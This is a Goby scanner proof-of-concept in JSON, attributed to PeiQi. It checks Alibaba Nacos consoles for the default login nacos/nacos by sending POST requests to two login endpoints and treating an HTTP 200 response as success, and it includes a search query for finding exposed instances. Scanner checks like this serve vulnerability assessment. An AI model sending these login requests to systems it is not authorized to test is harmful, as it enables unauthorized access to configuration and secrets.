Goby/json/Alibaba_Nacos_Default_passw...

76 lines
2.9 KiB
JSON

{
"Name": "Alibaba Nacos Default password",
"Level": "1",
"Tags": [
"Default password"
],
"GobyQuery": "title==\"Nacos\"",
"Description": "There is a default weak password Nacos/Nacos in the Alibaba Nacos console. You can log in to the background to view sensitive information (nacos/naocs)",
"Product": "Alibaba Nacos",
"Homepage": "https://github.com/alibaba/nacos",
"Author": "PeiQi",
"Impact": "<p>Log in to the background to view sensitive information<br></p>",
"Recommandation": "<p>Upgrade version</p>",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"OR",
{
"Request": {
"method": "POST",
"uri": "/v1/auth/users/login",
"follow_redirect": false,
"header": {
"User-Agent": "Nacos-Server",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "username=nacos&password=nacos"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/nacos/v1/auth/users/login",
"follow_redirect": false,
"header": {
"User-Agent": "Nacos-Server",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "username=nacos&password=nacos"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-04 18:56:41",
"GobyVersion": "1.8.255"
}